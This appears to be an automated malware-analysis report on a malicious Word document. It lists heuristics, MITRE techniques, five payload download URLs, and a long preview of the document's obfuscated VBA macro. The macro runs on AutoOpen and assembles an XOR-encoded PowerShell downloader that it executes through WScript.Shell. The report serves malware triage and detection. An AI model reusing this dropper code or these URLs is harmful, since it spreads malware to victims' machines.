MALICIOUS
350
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1218.011 Signed Binary Proxy Execution: Rundll32
The sample is a malicious Office document containing VBA macros. The AutoOpen macro is designed to execute code using WScript.Shell, which is a critical indicator of malicious intent. This suggests the document is a dropper intended to download and execute a secondary payload.
Heuristics 11
-
ClamAV: Doc.Dropper.Agent-6599413-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.Agent-6599413-0
-
VBA macros detected medium 5 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
WScript.Shell usage critical OLE_VBA_WSCRIPTWScript.Shell usageMatched line in script
wsfak = 4839 * WwRYR - 16827 + PsbzzI wSYXWQWjk = wYCnjzWcP + CreateObject("Wscript.shell").Run(anYwzGAEGn + Chr(vbKeyP) + ZOnwiZRLij + Chr(vbKeyO) + mOicmhSvdb + TrPHud, 821497031 - 821497031) UiOqz = 84383 * VahZMH - 88980 + DkowuV -
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
wsfak = 4839 * WwRYR - 16827 + PsbzzI wSYXWQWjk = wYCnjzWcP + CreateObject("Wscript.shell").Run(anYwzGAEGn + Chr(vbKeyP) + ZOnwiZRLij + Chr(vbKeyO) + mOicmhSvdb + TrPHud, 821497031 - 821497031) UiOqz = 84383 * VahZMH - 88980 + DkowuV -
Payload URL decoded from an encoded PowerShell loader (5 URLs) high OLE_VBA_ENCODED_PS_DROPPER_URLA VBA macro assembles (from literals scattered across helper functions) a WScript.Shell command that runs a PowerShell stage-2 loader whose download URL is hidden in a numeric char-code array — decoded at runtime by [char]($_ -bxor k) (or +k / -k) after splitting on obfuscated delimiters. The decoded hosts (often an @-separated fallback list dropped to %TEMP% and executed) are the next-stage payload URLs, never contiguous on disk; surfaced as IOCs. Self-validating: only a transform yielding a valid host URL is reported.
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Attribute VB_Name = "broBuuwKdwSMXm" Sub AutoOpen() On Error Resume Next -
Reference to Windows Script Host high SC_STR_WSCRIPTReference to Windows Script Host
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Suspicious extracted artifact medium EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://www.kotizacija.branding.ba/TsUbf7QLJ/ Referenced by macro
- http://avciogluaydinlatma.com/CQAPGgy/Referenced by macro
- http://www.elgg.tedzplace.ca/srfL4zx0IH/Referenced by macro
- http://www.creapackthai.com/ECd4TX4iyK/Referenced by macro
- http://iclub8.hk/Wu6OsKK/Referenced by macro
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 20610 bytes |
SHA-256: 6d9be33c1309473a98f62b52100957548c621e8c9024112ce015a829ba1fa3dd |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
366 of 625 identifiers look randomly generated (e.g. 'broBuuwKdwSMXm') — consistent with name-mangling obfuscation.
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "uavVvQnOus"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "broBuuwKdwSMXm"
Sub AutoOpen()
On Error Resume Next
kRvDF = httviO / 77299 + 13727 - cjsIkK + (87777 + hMLkT - OIALf * VFLpj)
RIVEN = OhqJk / 90230 + 94014 - rQNqtN + (26159 + inhCIl - XXDch * licwpV)
NEXGOh = ErVvSq / 52593 + 56664 - XKNdbS + (74702 + SPFFlk - EsbdaP * oaGBfB)
NPdwnn = WuRUo / 40316 + 10634 - WHlEso + (13072 + APvilL - RnbJV * StdDh)
zQjJZn = zhjXYP / 67333 + 54124 - EdIRp + (41681 + GjQiZp - dbZQbw * ttIjp)
pPMKaw = sLWml / 57289 + 58490 - cIJQIF + (10626 + wwHdEL - AlAfwq * FDcUi)
EmfzT = RkwPjk / 70007 + 37264 - LSSPh + (51898 + Bkwil - DFnnW * rLTKJS)
JqRHw = ncsLu / 33554 + 81641 - wcZSHd + (84300 + OzCSwW - WZnlaJ * nzpfE)
jmWPamh (iFVSMzKZHZA + raXpdKJdV + TkokFjI)
iiWvJ = YLYSlR / 16438 + 88830 - iOvCBi + (1293 + MPMGi - OlEYYz * rBRcT)
kiCJMl = UISAHp / 56784 + 48967 - jzTuO + (18184 + jtjwRq - daihP * KGzUqc)
SDRiT = hVUIZh / 52475 + 93764 - QdoXd + (90305 + aZINuz - zzDmC * dbAcj)
zBVUvL = FtlJF / 1595 + 83286 - luzlAI + (64945 + bsNzbC - HJwobV * QCWODJ)
End Sub
Function iFVSMzKZHZA()
On Error Resume Next
rDwRI = XjJobu * qkKdmC / hGJKrf - 30037 * (UzqOdM - 19073 - 98831 * VNjDFY + LUzmBW - Jbzblu)
ZADUn = 5035 - 90367 * 81418 + OzPal - HfWNnJ / iSmBT / (15723 * Rzdzi - (10764 / UkNspW + 21007 / OXXSmz))
dTwvPR = 71035 - 66616 * 73269 + mSnRWS - fCnvJV / nwDEOd / (1416 * ZjUJA - (74416 / SjBbJD + 6463 / NrEfm))
adTnMJ = 95297 - 25690 * 31285 + jlXIY - ZbhZz / idizJ / (64796 * ilYFAu - (71032 / PtOnz + 7769 / FQzjk))
plYUMAn = "wershell " + " " + " " + " " + " " + "&" + Chr(40) + " $" + "ShelLi"
KpUwwH = 32077 - 27415 * 62760 + IiRtG - NRFpjD / hLukbq / (24087 * wNkPr - (121 / CfZEC + 65709 / alKQQ))
EjCUc = 45104 - 98546 * 63442 + FkXBu - iwmmkE / VTidRS / (62077 * SmFfEt - (16078 / FzZjM + 6115 / qXDKF))
wmYBGL = 67030 - 71259 * 98719 + jAZnz - WqDWt / mLUlRH / (85544 * NIbQV - (1350 / dziZUG + 87643 / imPNZB))
nZzBGv = 73652 - 73915 * 7556 + pYUJJ - jdOwC / aQiAL / (28913 * JaKZiX - (47864 / jIvNY + 96561 / kjiYJ))
MbrBSfvt = "d[1]" + Chr(43) + "$Shel" + "LID[" + "13]" + Chr(43) + "'x'" + Chr(41) + " " + Chr(40) + " -jOin" + " " + Chr(40) + "'39%10" + "8,104m8"
GinQz = 25585 - 63408 * 40677 + astsYZ - Rzkts / zZatS / (73294 * CuTEAB - (85822 / FBUwco + 97184 / MBUJiz))
lUYLDE = 74870 - 32204 * 53705 + zRBnC - tKHZSz / rvKkj / (90921 * hAAXTI - (11058 / dLUznh + 52276 / EJPHdA))
CfnUhQ = 85952 - 38507 * 12148 + ljzRi - toIjv / VJSQL / (11954 * RnMhKw - (84558 / oYUkrN + 53060 / AdSZp))
oIUll = 27976 - 80394 * 11465 + uWrjZp - XjjMvQ / QhwzNr / (95290 * UEdiwj - (30743 / NPvYB + 11568 / RCXKzc))
tETvt = "5,62<1" + "09%10" + "2m116,46" + "m108" + "N97%105" + "N102e" + "96m119" + "s35e77"
TVTuw = 18213 - 57849 * 4250 + Emtoi - znTmo / QovDr / (88455 * Rmtjk - (92592 / rNPBi + 2591 / GPwwZt))
jfzQTh = 67741 - 27485 * 91496 + IalmOt - jQNaM / VvwWlI / (35367 * TERmVf - (788 / NJUlZD + 28703 / JElhro))
NUicUV = 21463 - 96489 * 11093 + KoWUAt - THDDG / XSjKNj / (44967 * qiZDRm - (5338 / GCLOHO + 27342 / TIKXOj))
BqznBP = 4895 - 62765 * 46158 + FPWkfK - JsOjl / REnTJ / (47077 * FSAdQv - (89364 / ijRLpY + 91981 / iBbFs))
VfHBs = "e102e11" + "9e45" + ",84s1" + "02e97N" + "64N111_10" + "6e102s"
bHtLKn = 19854 - 96362 * 33175 + sTKwRi - LnBAr / TIDnrE / (43373 * WHszv - (47441 / sswDuj + 29506 / DwBZCL))
jdnmFW = 82024 - 12973 * 16176 + OatamK - qLJhCb / zMKcOt / (19384 * zvPvT - (51709 / cjikB + 92259 / ESzbN))
EMKdCB = 79144 - 85978 * 22322 + sPSzd - LrqJRj / DRZqYI / (84579 * mjULlk - (72225 / SlhQSl + 40841 / wvGHFl))
ikkQaD = 13079 - 99447 * 35535 + uiWLRw - KjTuE / zKDMAr / (80872 * TovYHN - (59798 / XlsdKz + 96720 / klwfPV))
Ortqqb = "109@119" + "s56s39<80" + "%106,1" + "10U62_" + "36<107" + "e119s" + "119e"
YVjHM = 55447 - 20720 * 31243 + TjGjzo - NZwXYk / KRwqt / (56099 * kZAcw - (80444 / dZQHV + 92910 / jfmlIE))
PJhZw = 54490 - 1058 * 65149 + FFhfOb - sTIsLM / qEYUaH / (4767 * iUbJz - (39970 / nVHEih + 8108 / LUkhfG))
swCMr = 40132 - 49920 * 15446 + avtaN - EiLAf / kGiPmH / (25780 * pZWFH - (54335 / HldXNN + 65547 / iodjGP))
hHOfoC = 48724 - 81867 * 30250 + QnjjKF - AwpjA / PCnVbl / (19856 * lYHCR - (73630 / ImcmJd + 82535 / MOYZfk))
TYpuFqzo = "115%57" + "<44@44<11" + "6,116,1" + "16@45@10" + "4@108@" + "119,10" + "6U121e98" + "U96U1" + "06%105_98" + "%45N97@11" + "3s98<109" + ",103N106<"
VfakH = 84735 - 39290 * 93234 + MMHjB - nTkbz / idSZCc / (98381 * JYGkjE - (83632 / WVkmoY + 20117 / FwdJA))
zjcrMi = 76717 - 15073 * 17822 + irqAQf - vOiEij / mkzWsk / (61614 * VlGTNk - (76079 / nKMmGf + 42160 / ElahI))
dTAkE = 52732 - 67854 * 33716 + ZzmVE - zSIIWr / RtlGOi / (34640 * JwoFI - (75093 / cfMIW + 91381 / oUKRWG))
wfSNn = 3544 - 15878 * 20274 + PVUvo - XAwhJ / PrKEJS / (32817 * Ezpbz - (50387 / SVQpWM + 31747 / RUdWv))
EYTwvKYtE = "109U1" + "00s45s" + "97s9" + "8,44" + "@87U112" + "e86_" + "97s10" + "1N52,82U7"
SZlZi = 2801 - 13412 * 98444 + MAzHPz - PvGiqc / OVziEQ / (93561 * MLoqZC - (61497 / lLdhz + 15313 / nXpWu))
wPbKz = 90559 - 19211 * 29431 + jRFYQo - znsFGX / QIfGJR / (27615 * mQqIz - (37120 / bBYzHP + 26264 / RwVHh))
bcOblL = 4577 - 39061 * 78190 + zjUfp - IoUHLq / JQOCmO / (15486 * KjOKob - (63599 / IpHMX + 99314 / uijjqj))
Qccpd = 45399 - 8518 * 68737 + CiBPo - SYavjV / SMvwG / (97204 * GOuCb - (92513 / MBwfbq + 28058 / vjkTi))
zThBVdJSLS = "9<73e44" + "s67m10" + "7s119@" + "119@115U5" + "7_44_44" + "<98m" + "117U96%10" + "6N108U10" + "0@111"
alkuEK = 44926 - 16366 * 30360 + jMmzF - BGabM / EiJJp / (37343 * GiRIX - (12439 / ZtXWqz + 48844 / fLMbp))
ziNTX = 88077 - 21000 * 37258 + PdHnz - ZiiZM / RuibA / (12706 * zBcdi - (83128 / fQmDIr + 69111 / jTMUiu))
chAEF = 61564 - 77421 * 66410 + XnIUMm - ZwwbIv / RVRiKK / (29175 * bHmYvd - (57033 / TriujU + 67847 / WzUmX))
fcPEa = 15317 - 62850 * 11915 + uUDoJb - EPsbu / jElMs / (6469 * zzOiFb - (3822 / DzwzT + 14766 / BmLPZQ))
DJQpINaOn = "@118_98" + "e122<1" + "03_106" + ",109e1" + "11%98U" + "119,110%9" + "8s45," + "96m1" + "08N11"
TDjCjj = 77328 - 95105 * 56273 + crLAh - qWvKfk / BwwlBM / (26423 * cIvois - (85842 / uzVNKS + 78866 / iiiGz))
VpzsM = 26764 - 93258 * 90254 + uTHIn - nVGti / UECYY / (71987 * Dsfkr - (97572 / uvCsr + 31560 / GBrdqq))
SYQqD = 97423 - 1001 * 71952 + TocfrH - iQJQU / TOBSQN / (4990 * vhvOk - (39782 / unAXJ + 97172 / DPkBzn))
MBjdfE = 74794 - 95348 * 74212 + PjAiPL - vwcBNJ / PiJmC / (37574 * HtkvuF - (10548 / oHwKk + 96848 / RGtWjm))
wvjCAvzV = "0,44<" + "64U82%66<" + "83e68_10" + "0e12" + "2_44U67" + "e107N"
iFVSMzKZHZA = plYUMAn + MbrBSfvt + tETvt + VfHBs + Ortqqb + TYpuFqzo + EYTwvKYtE + zThBVdJSLS + DJQpINaOn + wvjCAvzV
Njaib = 8550 - 3216 * 77840 + imimYG - QHmzoc / sKslK / (74192 * OOPBiB - (39663 / IQOFCR + 70378 / LKwhUu))
wqCkKf = 48461 - 75162 * 2606 + cwqzWr - saZaY / Nfbtv / (55000 * GWkdY - (22992 / wnzNW + 48048 / uGIzq))
WcQvJ = 46110 - 31514 * 78201 + jmdKu - FMMaKS / EbLEz / (40434 * YTtFM - (70481 / GpUAvk + 83653 / NkLiS))
nUkWh = 44549 - 66509 * 37039 + BDTXTl - FMkwWl / arIkha / (27551 * NUBbh - (95632 / nJawXD + 97432 / MHaUrU))
End Function
Function raXpdKJdV()
On Error Resume Next
tvYjzO = 45183 - 79357 * 67834 + YvVjP - YzJHzX / aOhPAO / (52674 * UCdfXV - (47159 / VGRFP + 52844 / OLoVL))
zMfjJI = 8627 - 50068 * 99275 + wuKhs - EBFsXA / jRRsTZ / (53424 * wuQvD - (98496 / iiEuX + 5213 / bZHFV))
GQRYz = 35675 - 91826 * 29403 + QkAXwA - tmpim / bocdq / (63335 * skODJA - (61204 / szkDDr + 27195 / uzFCb))
UKqWC = 96966 - 34717 * 30323 + WbHMEs - BsXzio / iRcwO / (36651 * MtPiz - (84269 / IUWGzW + 68709 / zDXHWK))
sBIDvLX = "119N119" + "N115s57" + "<44<44@" + "116<116<1" + "16,45_" + "102_111N1"
VQnjnp = 56634 - 91405 * 39010 + OZzjWw - vUXBp / fibMU / (66762 * kiNMOz - (32074 / NqzwdJ + 78178 / shzzlK))
AbEfY = 39664 - 33308 * 34044 + dzlbzQ - CDimXF / QhVYcm / (74594 * OwTszr - (57478 / OUqmX + 29777 / IpBPP))
iltvt = 75694 - 95878 * 6088 + ofGzjn - EQwYs / SjSKB / (55768 * ibWXa - (61801 / ZzGEj + 14011 / fLjXf))
EdjMIz = 23984 - 55354 * 16937 + qqkLm - Yjkii / FLvqE / (67583 * XltawJ - (67383 / lIfANq + 68758 / SERFQY))
rcYicP = "00m100N45" + "<119m" + "102e1" + "03%121" + "s115e1" + "11e98@96N" + "102m45U" + "96@98e44" + ",112"
AllTr = 18760 - 25939 * 36843 + cimUp - NJjZD / hGKrsl / (5277 * VmnVLM - (94571 / CfRStM + 40816 / SLRES))
oovvu = 80568 - 83984 * 19479 + toBREM - YBFXp / zIiWPc / (38554 * GJXfj - (19960 / XuzBJ + 92771 / aZPov))
vdXiL = 8970 - 80886 * 75198 + XaOqw - fimXBm / GGWjn / (47891 * FHahSF - (56490 / tUbUmG + 44274 / mTzmv))
zwcrS = 59198 - 51477 * 52757 + YKjsqu - JdQXG / IkhVl / (73674 * hUwUT - (78618 / sTtSPb + 63409 / HNUidB))
FzLiszfD = "<113," + "101%79N" + "55U1" + "21m1" + "23@51@" + "74U75m" + "44_67s"
dQtOtW = 34014 - 15611 * 59790 + RFLQz - XrJtlR / hAvjhj / (24590 * mlKdJn - (6912 / GTlpJ + 6078 / vGZFwH))
jLcba = 52425 - 18123 * 67159 + huwJct - zVjAU / RiTir / (76254 * GFHFK - (47317 / oEjJr + 68298 / uuNKG))
ViDdt = 97815 - 66791 * 87757 + HrkVdb - nszEaN / laJksX / (70888 * YkUkX - (4602 / MLpZrw + 83064 / VGfTG))
BJLULO = 97749 - 74744 * 70502 + SdiTB - ptTjCa / cmiTz / (56625 * iQjJk - (1284 / pboMT + 67433 / WjYMu))
UpfjDiu = "107U11" + "9<119U11" + "5s57U44" + "@44U116," + "116e116%4" + "5_96<" + "113e102%9" + "8@115<"
LCsIp = 33924 - 6482 * 70102 + pWMBT - BtEZJj / OAVvuA / (76327 * NEilMi - (54584 / hkabzA + 6262 / vXZUNb))
wFFNjj = 48789 - 87991 * 92297 + zbdRrH - TRVnb / aLZcrM / (87725 * HRXVj - (8864 / NJVrt + 88475 / wBwfd))
LwoIUV = 59999 - 5088 * 18793 + ihCXs - GwLDh / Izwip / (23381 * YfLjz - (19074 / cPAKZ + 32484 / FnJrW))
woXnrm = 88552 - 44077 * 4765 + jcSiQH - YRWoj / qOzqA / (45010 * TRlKhz - (80128 / kpnNYf + 27300 / lwiQJ))
zGhMjMEbjN = "98e96" + "@104m1" + "19<107U98" + "e106" + "m45s9" + "6N10" + "8_110," + "44<70e64_" + "103e5" + "5%87," + "91<55s10" + "6,12"
mvAUa = 28924 - 11970 * 82138 + LmjTol - XwFNk / qvAdQB / (5343 * mrTqc - (55009 / qIiDRn + 6970 / dGcSh))
RJojWP = 95878 - 37281 * 21776 + YwYLV - iwpCY / lSJcnL / (78559 * IMHtWa - (62821 / EpNkL + 12839 / ZnYdL))
jdNFcY = 42228 - 50200 * 88314 + mibIMp - ovlWuA / nciRjp / (28303 * dIcjto - (88430 / KlKNa + 12325 / wokIji))
LmIlF = 8825 - 10462 * 38263 + wEndZv - cLJsj / WKStnj / (44349 * njVva - (9989 / EXYZW + 24077 / wdJiTP))
nTjSQEQI = "2<72" + "@44<" + "67%1" + "07_119N11" + "9N115U57" + "m44U4" + "4@10"
EmdXR = 99168 - 87759 * 7865 + ENEATj - vqutbl / mPhsjd / (99627 * fzEDqF - (43559 / uIGvF + 149 / FRRLo))
BcoPz = 77219 - 6813 * 56736 + XEOIfw - iJrtp / BJKfNp / (78633 * zUcSZm - (56431 / PCHcIQ + 17566 / iHwWZ))
aXTXb = 58743 - 9192 * 38193 + Noqakl - GMjiup / MVkAKB / (10955 * SMZuFw - (3315 / wrvbu + 77630 / qYOnA))
oowSC = 83275 - 15403 * 69738 + NaqYi - wPpXZ / AlUqi / (73714 * bbORLO - (81930 / GkoOO + 75361 / vfEhRQ))
tBwsfzVOWp = "6,96" + "e111%1" + "18<97e59" + "U45_" + "107<1" + "04_44,84"
prdklG = 3938 - 82408 * 57978 + SVUViB - jrEBhr / NrYCtb / (92657 * EJcUv - (18768 / rzUUw + 54779 / aSopi))
jCTvqB = 91835 - 10451 * 14741 + ccksJ - oHjYno / nqEJuv / (99565 * CjjUq - (90227 / RZYPJ + 45320 / jQiIPi))
jArvJj = 9454 - 73575 * 83356 + JHzZw - XToSp / AYiVp / (19162 * fmjRkV - (60415 / ZjOQfi + 45063 / BaXkO))
vwiIzi = 44137 - 88041 * 66136 + zCwFQK - JFjNAF / MuWHRF / (28046 * sORIb - (39147 / RmZJA + 44522 / wWpPZ))
VLnablXHF = "m118U" + "53s7" + "6e112<72m" + "72%44%" + "36m45@80" + "_115e111%" + "106,119"
oaPsX = 1750 - 36755 * 31852 + quzLPd - NEQJwn / CKacS / (55744 * SZZYzF - (2921 / ziYIsX + 41554 / WIcLNT))
VsMhV = 36736 - 14476 * 97482 + GtELVK - QEWWT / LFjMT / (88009 * jSTdl - (92400 / mXzzoF + 14400 / HCMzq))
jENUk = 40124 - 63355 * 12995 + JzNvz - ZaZZUn / HZiNtH / (97038 * zUDdzN - (12860 / AbIfV + 76415 / aKHPhb))
FIBAN = 65804 - 94417 * 46764 + nsYVY - RYpVGm / puCjcD / (38895 * RhwFTQ - (91401 / oJAGY + 41202 / zzJjq))
XMdsjd = "<43@36" + "e67e36<4" + "2N56" + "@39," + "82e9" + "1s96@3" + "5_62%35" + "@36_"
aVlqzo = 73215 - 43713 * 52551 + IXKfJ - CZSRZ / MIXTbI / (7117 * rQCMti - (85505 / QSXdz + 68326 / zdSQs))
ihoTJf = 28460 - 31975 * 35719 + jsunEm - Ifqdz / BJHYu / (1364 * oaFwLa - (5642 / XWmbfo + 86917 / tzAGC))
WpwiO = 75021 - 18441 * 3585 + UPipG - zcijQl / DCTiI / (74664 * atthm - (6653 / zjMPh + 40660 / SLzzn))
pOKNb = 17336 - 56234 * 37028 + MiTphr - wlbZv / Atvwc / (71351 * qIrLj - (3750 / rwSZP + 76315 / FtKKCf))
TiPMwiswsj = "49e50m36" + "_56m39e" + "82e89@10" + "6U62N39U" + "102U109," + "117s57" + "%119<" + "102s1" + "10N115<4" + "0@36,95" + "_36N"
wVWXmP = 26158 - 73453 * 92629 + kiWnh - WBCCWz / STiQvk / (83380 * iVCRE - (44652 / uWpiB + 41858 / lLhjrp))
oppQX = 42271 - 99177 * 1426 + WhQEI - PYYjB / khQJpP / (912 * TFjXKE - (24855 / QMSVdF + 92354 / GSTuR))
EKKFEH = 49633 - 15200 * 66417 + zItQA - uEpfHL / fVflG / (3973 * wGaVA - (42817 / EzFJI + 58311 / WVLfI))
zkOzaE = 7860 - 8121 * 98735 + BEoFI - VcDzG / MszZqh / (44555 * OsCZhk - (76888 / iTSqX + 44785 / zjWcqL))
zEQqh = "40e39s82" + "%91U" + "96U40s36" + "U45m" + "102<123" + "e102m3" + "6<56U101" + "%108m" + "113U" + "102%"
raXpdKJdV = sBIDvLX + rcYicP + FzLiszfD + UpfjDiu + zGhMjMEbjN + nTjSQEQI + tBwsfzVOWp + VLnablXHF + XMdsjd + TiPMwiswsj + zEQqh
YOEmq = 86875 - 91653 * 58794 + ZWSFLK - hYQifp / kVwjC / (18898 * TGwnwh - (2424 / iHaiUa + 67513 / CSBdon))
YlvtG = 51262 - 72407 * 25687 + Tmvzsn - ZYBNw / KUGMW / (67948 * JhILKc - (91505 / mktTB + 83516 / lrzpZ))
wvUXF = 36870 - 50621 * 51559 + tECbWl - knPsJm / ItwOzj / (29583 * jJbNm - (76161 / EIVozq + 77841 / aUcHG))
iiiKU = 32535 - 84484 * 23489 + UkFPUS - crstI / zViBi / (92411 * AjLjr - (37889 / PXjXm + 91270 / NjVTWk))
End Function
Function TkokFjI()
On Error Resume Next
ZhAJH = 24430 - 57634 * 16467 + drYiY - zJwqwi / XVnzT / (55087 * tUcIE - (13119 / bDfaJw + 7686 / zbLQYb))
LlzHDF = 22676 - 2851 * 43081 + PfHKYp - qdTDPw / waYzhi / (54201 * woAzE - (93869 / bdKcmY + 74216 / WwsLTO))
fwnWI = 55210 - 63512 * 27910 + rNEiS - YlAwB / tmLEMl / (3928 * pTIvj - (16540 / MioPu + 29675 / lZUDWM))
iQJcS = 19875 - 59546 * 43158 + tBmLJ - PaRQX / SPnmD / (59929 * MlDEv - (64918 / LzcoRw + 63588 / hIKsi))
MQboChYNiD = "98U96U1" + "07,43e3" + "9,118,1" + "18%73<" + "35<1" + "06@109U" + "35m39<" + "80s1" + "06%110U42" + "%120s119<" + "113,1"
GLVMa = 74695 - 17515 * 53531 + wriNi - EICKG / DLjGZ / (5638 * mjIOp - (56069 / IniGVu + 70639 / rXPBL))
aRPzCl = 12439 - 45267 * 90698 + QfaPbs - XJjZG / QHPzo / (5281 * jFPPQ - (14157 / rPnAfn + 66496 / daNft))
YYXVU = 96888 - 98947 * 80399 + oRUXDK - KwURb / WjuSk / (2221 * ojJJDI - (62869 / uwIbBc + 97678 / KQfEOQ))
ULBMG = 21422 - 6435 * 98723 + GAjHpi - cpkvQR / voLbn / (38622 * qYroS - (47270 / CjSfI + 3140 / GlnviE))
hLkVOY = "22e120s3" + "9_10" + "8s104" + "e85@45s7" + "1%108m116" + "%109,1" + "11_108" + "N98m10" + "3@69m106N" + "111%102N"
KctQC = 82703 - 51922 * 3665 + wMwEI - UuiWQ / LpZiX / (95933 * BEwPYU - (97741 / KriBTu + 89686 / pitazw))
aWCDib = 66763 - 73126 * 1713 + FuqiY - bKjTz / MUOfjr / (89547 * HPTmw - (4374 / FQTIT + 98403 / WzuzUE))
GlSjaJ = 64252 - 79161 * 5146 + rrhNpb - iVdVt / KiAZw / (28448 * lWpkBd - (1318 / VtpQO + 51800 / cRZjY))
arzLzm = 36708 - 72999 * 58698 + qAJBwZ - JdKDzV / IQLkzd / (45823 * FTWYYI - (99052 / rFAIcu + 70783 / tFJQVm))
WwFitKjowBa = "43s3" + "9U118m118" + "@73<47e" + "35U39" + ",82@89N" + "106e42e" + "56e80,11" + "9<98m11" + "3N119m4"
PzbNNV = 15417 - 11038 * 50526 + jaRGVB - MMaBMc / FiptBi / (1256 * quWXO - (45458 / IswvJF + 80511 / UvaVMU))
QQlmDE = 84842 - 22 * 22536 + ciuVr - RzLIT / DLNruJ / (17229 * AoQBfb - (35893 / zXXFPO + 32510 / hSNFS))
bnToN = 50265 - 48009 * 23539 + iraOn - tqQAk / olNMo / (89375 * KcvCSA - (26368 / hrOsHk + 26563 / OpAdKo))
pDWmHi = 62711 - 26964 * 7280 + iSkXkw - YZEhEQ / iPiUw / (53231 * owsET - (1495 / PFbitD + 52579 / FZjzmw))
AMuXscC = "6s83<1" + "13%1" + "08,96%" + "102s" + "112m1" + "12s3"
zFhAmC = 11351 - 52539 * 48671 + kBhmoH - ZmLzB / cPavz / (45983 * QiWAwz - (71287 / aZbPp + 24745 / ijDah))
OjKXFK = 85246 - 87489 * 68111 + zESOh - jCAlI / qqwkuP / (43824 * zodtd - (78647 / iHvBiS + 96525 / KvDnzU))
QRrctT = 47315 - 40625 * 30781 + WaEKbY - sjEuFk / TsJoor / (53883 * oBYLC - (2395 / MGmfYH + 84860 / WjXSuT))
EXccwz = 9367 - 71033 * 23828 + GDlOG - joqWOw / kjMvF / (62135 * sYqCMG - (88057 / CAjPO + 34715 / MDwQD))
cDtvmWSt = "5m39," + "82e89" + "U106@56" + "@97e113_" + "102,98,10" + "4@56N" + "126%96U9" + "8e119%9"
BKjMI = 3203 - 18997 * 70040 + YBzmDl - VjzTw / aMWbw / (75371 * QZhDX - (99451 / iqstD + 41905 / GXHFp))
lNiWqs = 70159 - 80940 * 81354 + faLtU - AHiuIz / aijNjl / (25769 * lDiXp - (5899 / AsSPQK + 58712 / zwLwoB))
RinSI = 84417 - 19586 * 59580 + EcHuW - VfqIGp / thkwEh / (31773 * pYJPm - (91808 / XvAqNR + 21483 / DjDRbj))
TBiwAS = 86808 - 71072 * 39785 + hCWfQw - wOEXk / rEQcCT / (78746 * VJClP - (83497 / CFGcKA + 21113 / jqpIDL))
fjXnNhqHdjG = "6s107e12" + "0U12" + "6%12" + "6'-SPl" + "It 's" + "' -SplI" + "t '<'-SpL" + "iT '_" + "' -SpLIT " + "'e' " + "-sPLI" + "T',' -"
jufpo = 12998 - 65344 * 23160 + cOcPDz - kllIvH / cKitj / (23181 * Pprjs - (29187 / zGdpiN + 26254 / owjGFS))
YKjAj = 10546 - 95507 * 57556 + aIUCbt - dYTHq / OUisfd / (37055 * DTVmB - (93471 / iTNbq + 16192 / KfNLp))
WBjJh = 51395 - 92572 * 22470 + nZTKa - pwQaw / uFFfA / (79138 * KwiUn - (92202 / BjMEaA + 81829 / jnHfi))
pYKYiD = 59017 - 12601 * 24831 + zmNZl - LiumiI / MuCdW / (73564 * ZGijA - (35865 / UkjSA + 31113 / ibAaCQ))
IUBjQuFIf = "SPlIt'M" + "' -splIT'" + "%'-S" + "plIT '@" + "'-sp" + "lIt 'u'" + " -spli"
UhzktV = 54331 - 92352 * 57310 + hloBXI - jOvVF / LzvLhY / (35708 * UGZpR - (64248 / uaCFFj + 45120 / MppXha))
LpcuzP = 87930 - 96632 * 50874 + oBWaH - KCllf / pYjjF / (45915 * AlsJEZ - (16510 / ZOLbwX + 66952 / GMUXAA))
szQnzD = 20374 - 32209 * 19264 + Uabwr - Bwjko / JiAGwd / (39569 * AczqAL - (76596 / IWOzBF + 54239 / GiPuSY))
mNPwm = 71307 - 95226 * 20465 + XLENiO - GbWlo / PzCnKj / (42043 * BkzDUM - (50963 / vwwPI + 66606 / iKKzdi))
kBZijMG = "T 'n'" + "|fOrea" + "ch-OB" + "jEcT " + "{[CHAr] " + Chr(40) + " $_ "
PGSnh = 76292 - 87358 * 11054 + wYVral - fiPpMW / YEGCzT / (26895 * ScLkki - (46339 / zPQhB + 54426 / kWVijQ))
slIIEb = 94035 - 29501 * 8456 + QAoMr - ZzjZTs / FQaJa / (55893 * wIRDQ - (56497 / wnsrZa + 14005 / dZSdr))
jnuIAj = 6097 - 84489 * 56925 + VmlHH - lvOObK / htRzzm / (3474 * zlnOVW - (91533 / whGJb + 41960 / pzwunX))
iEtQt = 68201 - 51692 * 71323 + mTWGtj - AOHXRa / opwUWf / (57311 * iJOtHr - (38307 / ofMViN + 60353 / rDhUU))
XkiuLJKp = "-BxOR '0" + "x03'" + Chr(41) + "} " + Chr(41) + Chr(41) + " "
TkokFjI = MQboChYNiD + hLkVOY + WwFitKjowBa + AMuXscC + cDtvmWSt + fjXnNhqHdjG + IUBjQuFIf + kBZijMG + XkiuLJKp
cDZzM = 27178 - 66502 * 66715 + EbaYA - smNpfR / UANLGc / (95733 * sNTiJ - (70141 / VJhiOi + 2369 / AzmrHM))
